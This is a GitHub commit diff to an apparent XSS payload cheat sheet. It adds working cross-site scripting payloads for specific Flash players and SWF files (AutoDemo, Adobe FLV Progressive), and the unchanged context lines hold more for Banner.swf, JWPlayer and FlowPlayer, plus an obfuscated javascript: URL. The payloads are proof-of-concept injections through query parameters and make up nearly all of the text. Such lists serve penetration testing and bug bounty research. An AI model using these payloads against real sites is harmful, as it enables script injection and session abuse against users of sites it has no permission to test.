[XSS] add extra SWF refs from notes

This commit is contained in:
Yasin Soliman 2017-10-01 10:19:34 +01:00 committed by GitHub
parent 60c998c43d
commit 74b9508019

View file

@ -128,6 +128,10 @@ javas	cript://www.google.com/%0Aalert(1)
- Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()` - Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()`
- AutoDemo: `control.swf?onend=javascript:alert(1)//`
- Adobe FLV Progressive: `/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//` and `/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//`
- Banner.swf (generic): `banner.swf?clickTAG=javascript:alert(document.domain);//` - Banner.swf (generic): `banner.swf?clickTAG=javascript:alert(document.domain);//`
- JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)` - JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)`
@ -136,7 +140,7 @@ javas	cript://www.google.com/%0Aalert(1)
- FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf` - FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf`
_Note: Useful reference on SWF XSS construction from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._ _Note: Useful reference on constructing Flash-based XSS payloads from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._
**Lightweight Markup Languages** **Lightweight Markup Languages**